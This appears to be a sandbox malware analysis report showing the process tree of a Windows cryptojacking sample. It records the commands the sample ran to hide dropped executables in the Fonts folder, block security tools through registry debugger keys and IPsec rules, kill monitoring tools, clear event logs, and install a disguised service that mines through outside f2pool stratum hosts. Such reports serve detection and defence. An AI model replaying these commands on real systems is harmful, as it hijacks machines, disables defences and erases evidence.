    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        command: wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
        - Kills process with WMI
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\attrib.exe
        command: attrib +s +h +r C:\Windows\svchost.exe
        - Sets file to hidden
        - Drops file in Windows directory
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe
        command: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        command: cacls C:\Windows\svchost.exe /d everyone
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc stop conhost
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc delete conhost
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        command: wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
        - Kills process with WMI
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\takeown.exe
        command: takeown /f C:\Windows\SysWOW64\conhost.exe /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe
        command: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        command: cacls C:\Windows\SysWOW64\conhost.exe /d everyone
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc start PolicyAgent
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc config PolicyAgent start= AUTO
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\netsh.exe
        command: netsh ipsec static del all
    [3] C:\Windows\SysWOW64\netsh.exe
        command: netsh ipsec static add policy name=Aliyun
    [3] C:\Windows\SysWOW64\netsh.exe
        command: netsh ipsec static add filterlist name=Allowlist
    [3] C:\Windows\SysWOW64\netsh.exe
        command: netsh ipsec static add filterlist name=denylist
    [3] C:\Windows\SysWOW64\netsh.exe
        command: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
    [3] C:\Windows\SysWOW64\netsh.exe
        command: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
    [3] C:\Windows\SysWOW64\netsh.exe
        command: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
    [3] C:\Windows\SysWOW64\netsh.exe
        command: netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Aliyun assign=y3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsars.exe /im lsacs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im sqlservr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\sqlservr.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\sqlservr.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\csrss.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\csrss.exe /d everyone3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\lsass.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\lsass.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wscript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "windows powershell"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "security"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "system"3⤵
- Clears Windows event logs
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del1⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
